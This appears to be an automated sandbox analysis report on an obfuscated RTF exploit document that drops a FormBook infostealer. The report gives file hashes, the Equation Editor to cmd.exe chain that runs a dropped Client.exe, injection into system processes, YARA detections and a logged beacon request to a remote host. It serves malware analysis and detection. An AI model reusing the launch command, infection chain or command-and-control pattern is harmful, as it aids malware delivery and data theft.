                                                  SHA-512:39C2C4AEDC51017041F05D32BF9FB227C60604C4604EAF30BDCE7B7EBE838B326D8FBD1E3352BF24219C420605D0A77A8AC722AB62B3B950A3744E11BD226984
                                                  Malicious:false
                                                  Preview:L..................F.... .......Z.......Z....6..Z.....,..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1......U...Desktop.d......QK.X.U.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2...,..U. .SECURI~1.RTF..........U..U.*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.t.f...O.b.f.u.s.c.a.t.e.d...3.2...1.2.3.9.5...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\048707\Users.user\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf.K.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.t.f...O.b.f.u.s.c.a.t.e.d...3.2...1.2.3.9.5...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............

                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):148
                                                  Entropy (8bit):4.980743826841669
                                                  Encrypted:false
                                                  SSDEEP:3:bDuMJluscbcTLqjQWC0LULeBCmxW9rbcTLqjQWC0LULeBCv:bCVwTeS0LCeBgrwTeS0LCeBs
                                                  MD5:F5B5C7A44D064A168B55B6546BEB143F
                                                  SHA1:DF650FE24365C0DF6B059F048104A0E458C87E56
                                                  SHA-256:A102AB1C9E3EE964697863D84AEADD8D4D36BA057DF75DC66AB8CED753A20090
                                                  SHA-512:9AAACF55B9357FC3E282C44D6E5E9514AEC3D7FCFC8FE60F0CE01A9EA92CA9729081CFC7896C411686D2E0C03729B5D72CA22F1D645634440A41145B6434E762
                                                  Malicious:false
                                                  Preview:[folders]..Templates.LNK=0..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.LNK=0..[misc]..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.LNK=0..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.503835550707525
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                                                  MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                                                  SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                                                  SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                                                  SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                                                  Malicious:false
                                                  Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

                                                  C:\Users\user\Desktop\~$curiteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.503835550707525
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                                                  MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                                                  SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                                                  SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                                                  SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                                                  Malicious:false
                                                  Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

                                                  Static File Info

                                                  General

                                                  File type:Rich Text Format data, version 1, unknown character set
                                                  Entropy (8bit):4.78563050775552
                                                  TrID:
                                                  • Rich Text Format (5005/1) 55.56%
                                                  • Rich Text Format (4004/1) 44.44%
                                                  File name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf
                                                  File size:2883613
                                                  MD5:26111b2647fc8b1e3e123e825f716b94
                                                  SHA1:131907f569a2774c1800430ccf052896dc685ec0
                                                  SHA256:7d4a1c05f377343f063e0b265fc85f928b59f0cd88914f2b2715c4a25c734838
                                                  SHA512:44c6bdb04ac725f0d73f53e4b770502033171213e0194899e781df10f9e2d3e80d50985f1c0500feda91f76948c1f04fa3a6713aab36d76c135b7df736ef23d3
                                                  SSDEEP:24576:tSRlUCdvKN2W0fKMjy7qXpGjbqi1VzEjCpqdf9bSrdMymS1W:c
                                                  TLSH:99D5A570B1B535C6E26F0172429FBC59521738C7B3C62D88811DEAF62ED4B7A7B41A0E
                                                  File Content Preview:{\rtf1{\*\pnseclvl3\pndec\pnstart1\pnindent720\pnhang {\pntxta .}}{\*\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang {\pntxta )}}{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}{\*\pnseclvl6.\pnlcltr\pnstart1\pnindent720\pnhang {\pnt

                                                  File Icon

                                                  Icon Hash:e4eea2aaa4b4b4a4

                                                  Static RTF Info

                                                  Objects

                                                  IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                  00000128Dh2embeddedPackage948903Client.exeC:\Path\Client.exeC:\Path\Client.exeno
                                                  1001DF7BDh2embeddedEquation.33072no

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Aug 8, 2022 12:08:49.397722006 CEST4917180192.168.2.2245.33.18.44
                                                  Aug 8, 2022 12:08:49.539129972 CEST804917145.33.18.44192.168.2.22
                                                  Aug 8, 2022 12:08:49.539345026 CEST4917180192.168.2.2245.33.18.44
                                                  Aug 8, 2022 12:08:49.539773941 CEST4917180192.168.2.2245.33.18.44
                                                  Aug 8, 2022 12:08:49.683424950 CEST804917145.33.18.44192.168.2.22
                                                  Aug 8, 2022 12:08:49.683451891 CEST804917145.33.18.44192.168.2.22
                                                  Aug 8, 2022 12:08:49.683665991 CEST4917180192.168.2.2245.33.18.44
                                                  Aug 8, 2022 12:08:49.683860064 CEST4917180192.168.2.2245.33.18.44
                                                  Aug 8, 2022 12:08:49.827022076 CEST804917145.33.18.44192.168.2.22
                                                  Aug 8, 2022 12:09:09.413953066 CEST4917280192.168.2.2245.33.6.223
                                                  Aug 8, 2022 12:09:09.555061102 CEST804917245.33.6.223192.168.2.22
                                                  Aug 8, 2022 12:09:09.555181980 CEST4917280192.168.2.2245.33.6.223
                                                  Aug 8, 2022 12:09:09.556029081 CEST4917280192.168.2.2245.33.6.223
                                                  Aug 8, 2022 12:09:09.697192907 CEST804917245.33.6.223192.168.2.22
                                                  Aug 8, 2022 12:09:09.698842049 CEST804917245.33.6.223192.168.2.22
                                                  Aug 8, 2022 12:09:09.698944092 CEST804917245.33.6.223192.168.2.22
                                                  Aug 8, 2022 12:09:09.698975086 CEST4917280192.168.2.2245.33.6.223
                                                  Aug 8, 2022 12:09:09.699006081 CEST4917280192.168.2.2245.33.6.223
                                                  Aug 8, 2022 12:09:09.721349955 CEST4917280192.168.2.2245.33.6.223
                                                  Aug 8, 2022 12:09:09.862656116 CEST804917245.33.6.223192.168.2.22

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Aug 8, 2022 12:08:49.188456059 CEST5586853192.168.2.228.8.8.8
                                                  Aug 8, 2022 12:08:49.348788977 CEST53558688.8.8.8192.168.2.22
                                                  Aug 8, 2022 12:09:09.352061987 CEST4968853192.168.2.228.8.8.8
                                                  Aug 8, 2022 12:09:09.386590958 CEST53496888.8.8.8192.168.2.22
                                                  Aug 8, 2022 12:09:09.732258081 CEST5883653192.168.2.228.8.8.8
                                                  Aug 8, 2022 12:09:09.754498959 CEST53588368.8.8.8192.168.2.22
                                                  Aug 8, 2022 12:09:14.764194012 CEST5013453192.168.2.228.8.8.8
                                                  Aug 8, 2022 12:09:14.786825895 CEST53501348.8.8.8192.168.2.22

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Aug 8, 2022 12:08:49.188456059 CEST192.168.2.228.8.8.80xceeeStandard query (0)www.magadirect.co.ukA (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:09:09.352061987 CEST192.168.2.228.8.8.80xca44Standard query (0)www.sqlite.orgA (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:09:09.732258081 CEST192.168.2.228.8.8.80xc4a9Standard query (0)www.luanaterra.onlineA (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:09:14.764194012 CEST192.168.2.228.8.8.80xca6dStandard query (0)www.hogogala.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk45.33.18.44A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk72.14.185.43A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk45.33.30.197A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk45.33.20.235A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk45.79.19.196A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk45.56.79.23A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk96.126.123.244A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk72.14.178.174A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk198.58.118.167A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk173.255.194.134A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk45.33.23.183A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk45.33.2.79A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:09:09.386590958 CEST8.8.8.8192.168.2.220xca44No error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:09:09.754498959 CEST8.8.8.8192.168.2.220xc4a9Name error (3)www.luanaterra.onlinenonenoneA (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:09:14.786825895 CEST8.8.8.8192.168.2.220xca6dNo error (0)www.hogogala.com162.213.253.236A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.magadirect.co.uk
                                                  • www.sqlite.org

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.224917145.33.18.4480C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Aug 8, 2022 12:08:49.539773941 CEST1OUTGET /aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM HTTP/1.1
                                                  Host: www.magadirect.co.uk
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Aug 8, 2022 12:08:49.683424950 CEST1INHTTP/1.1 404 Not Found
                                                  server: openresty/1.13.6.1
                                                  date: Mon, 08 Aug 2022 10:08:49 GMT
                                                  content-type: text/html
                                                  content-length: 175
                                                  connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.224917245.33.6.22380C:\Windows\SysWOW64\NAPSTAT.EXE
                                                  TimestampkBytes transferredDirectionData
                                                  Aug 8, 2022 12:09:09.556029081 CEST2OUTGET /2014/sqlite-dll-win32-x86-3080700.zip HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: www.sqlite.org
                                                  Connection: Keep-Alive
                                                  Aug 8, 2022 12:09:09.698842049 CEST3INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  Date: Mon, 08 Aug 2022 10:09:09 GMT
                                                  Content-type: text/html; charset=utf-8
                                                  Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 20 6c 69 6e 65 6e 6f 3d 22 33 39 30 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 63 75 6d 65 6e 74 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 2f 32 30 31 34 2f 73 71 6c 69 74 65 2d 64 6c 6c 2d 77 69 6e 33 32 2d 78 38 36 2d 33 30 38 30 37 30 30 2e 7a 69 70 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 0a 3c 2f 62 6f 64 79 3e 0a
                                                  Data Ascii: <head><title lineno="390">Not Found</title></head><body><h1>Document Not Found</h1>The document /2014/sqlite-dll-win32-x86-3080700.zip is not available on this server</body>


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:12:07:13
                                                  Start date:08/08/2022
                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                  Imagebase:0x13f9e0000
                                                  File size:1423704 bytes
                                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:2
                                                  Start time:12:07:15
                                                  Start date:08/08/2022
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                  Imagebase:0x400000
                                                  File size:543304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:3
                                                  Start time:12:07:16
                                                  Start date:08/08/2022
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:CmD.exe /C %tmp%\Client.exe A C
                                                  Imagebase:0x4a690000
                                                  File size:302592 bytes
                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:5
                                                  Start time:12:07:16
                                                  Start date:08/08/2022
                                                  Path:C:\Users\user\AppData\Local\Temp\Client.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\Client.exe A C
                                                  Imagebase:0x1180000
                                                  File size:948736 bytes
                                                  MD5 hash:D94161753531177B2FB80365ADDCBFA8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 22%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Target ID:9
                                                  Start time:12:07:32
                                                  Start date:08/08/2022
                                                  Path:C:\Windows\SysWOW64\notepad.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B}
                                                  Imagebase:0x570000
                                                  File size:179712 bytes
                                                  MD5 hash:A4F6DF0E33E644E802C8798ED94D80EA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  General

                                                  Target ID:10
                                                  Start time:12:07:39
                                                  Start date:08/08/2022
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0xff040000
                                                  File size:3229696 bytes
                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  General

                                                  Target ID:11
                                                  Start time:12:08:19
                                                  Start date:08/08/2022
                                                  Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                  Imagebase:0xa00000
                                                  File size:279552 bytes
                                                  MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
